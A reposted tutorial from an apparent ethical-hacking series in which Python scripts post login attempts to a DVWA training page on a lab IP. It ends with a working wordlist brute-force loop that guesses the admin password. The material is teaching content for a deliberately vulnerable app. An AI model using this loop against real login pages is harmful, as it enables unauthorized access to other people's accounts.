首页 > 编程语言 > 详细

Python Ethical Hacking - WEB PENETRATION TESTING(5)

时间:2019-10-20 11:35:39      阅读:49      评论:0      收藏:0      [点我收藏+]

Guessing Login Information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.php

技术分享图片

 

 

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "dfdfddfd", "password": "1234", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

Execute the Python Script.

技术分享图片

 

 

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "password", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

技术分享图片

 

 

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "", "Login": "submit"}

with open("password.list", "r") as wordlist_file:
    for line in wordlist_file:
        word = line.strip()
        data_dict["password"] = word
        response = requests.post(target_url, data=data_dict)
        if "Login failed" not in response.content.decode():
            print("[+] Got the password --> " + word)
            exit()

print("[+] Reached end of line.")

技术分享图片

 

Python Ethical Hacking - WEB PENETRATION TESTING(5)

原文:https://www.cnblogs.com/keepmoving1113/p/11706825.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!